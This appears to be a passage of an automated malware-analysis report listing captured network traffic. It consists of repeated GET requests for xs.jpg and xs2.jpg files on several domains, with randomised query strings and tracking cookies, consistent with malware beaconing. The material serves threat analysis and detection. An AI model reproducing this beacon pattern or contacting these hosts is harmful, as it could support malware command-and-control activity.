        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?bbd2b314=-1424130204 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159354|1720159259|4|25|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?c1df27dd=251215592 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159354|1720159259|3|25|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?c3baede6=500657968 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159355|1720159260|4|25|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?c750acd5=-1902028374 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?cbebb896=1673734594 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?d597c30b=-2134423263 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159357|1720159259|3|26|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?defe4bdb=972408610 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159358|1720159259|3|26|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?e806d3ea=675115834 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159359|1720159260|4|26|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ed0b353e=-954097734 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?f50273b1=-1659498183 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?4745dc7=523145329 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159361|1720159259|3|27|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?c7a449b=1256037282 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159362|1720159259|3|27|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?10878fe9=831958971 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159363|1720159260|4|27|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?17066025=-432029326 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1ebf202e=-684072638 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2e78457f=1559268094 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159366|1720159259|4|28|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?356cb59d=1979250507 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159366|1720159259|3|28|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3b3f41b1=-1631925289 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159367|1720159260|4|28|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3fc1b58c=-1102317868 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?a0c60b5a=1203532164 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?993d7f2c=-30180388 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159370|1720159259|4|29|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?d9ba63d9=-642096167 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159371|1720159259|4|29|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?8f00ee41=-1777774966 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159372|1720159260|4|29|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?696b574e=1010959850 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?cd510956=43331246 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?91f5dba5=-1243507985 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159375|1720159259|4|30|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?96090d15=739383850 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159375|1720159259|4|30|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?15c817e8=365434856 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159376|1720159260|4|30|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?334f6b3c=870089576 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1da045db=-1809752761 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?41ed49d4=-976757380 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159380|1720159259|4|31|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?826f9a23=-2106615261 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159380|1720159259|4|31|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2ec75429=1983553864 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159381|1720159260|4|31|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2d6766a9=1799042376 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?43b77b4=71006132 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3385c362=1755862958 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159384|1720159259|4|32|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1bbff591=1396695219 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159385|1720159259|4|32|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?7d9f9d7d=2027870327 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159385|1720159260|4|32|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ff31f566=-54012520 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?b51d7645=-1986834599 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?a08af9ff=72863736 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159389|1720159259|4|33|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?5a3b4a05=2006910499 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159389|1720159259|4|33|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?86fb760c=-1561768388 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159390|1720159260|4|33|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?6307741b=-972101578 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?38373338=-101659400 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?52638f9=777519297 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159393|1720159259|4|34|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?cdc80b22=164654932 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159394|1720159259|4|34|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?146c7f21=685309506 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159394|1720159260|4|34|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a01325a2=1076251460 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?13966ddd=657251258 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?140bbffd=1681571825 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159397|1720159259|4|35|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ec575cc=1239108860 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159398|1720159259|4|35|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?e3527f49=-1924530908 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159398|1720159260|4|35|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1b715571=-151256839 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?c74bfbd0=-951321648 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?eb7bcec3=-1032623031 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159401|1720159259|4|36|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ca9a0e20=1607346784 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159402|1720159259|4|36|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?608cb344=1129067416 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159402|1720159260|4|36|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?bd60bc68=2059499728 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?7f13e7e5=-154726670 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?20062123=-1608604241 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159407|1720159259|5|37|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?cd024f52=-1710973276 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159407|1720159259|4|37|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?81924fcd=-1962922341 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159408|1720159260|5|37|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?5b13db53=-1899589314 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?669212f9=-838957873 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?da20f51d=-2058775774 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159411|1720159259|4|38|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?eb94bb2e=-342574290 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159411|1720159259|4|38|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?70445cbe=-228113746 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159412|1720159260|4|38|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?972d623=951125202 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?d82b8544=1622021392 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?b09f39d0=-732261200 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159415|1720159259|4|39|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?dbb6fc30=-1826294640 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159416|1720159259|4|39|0
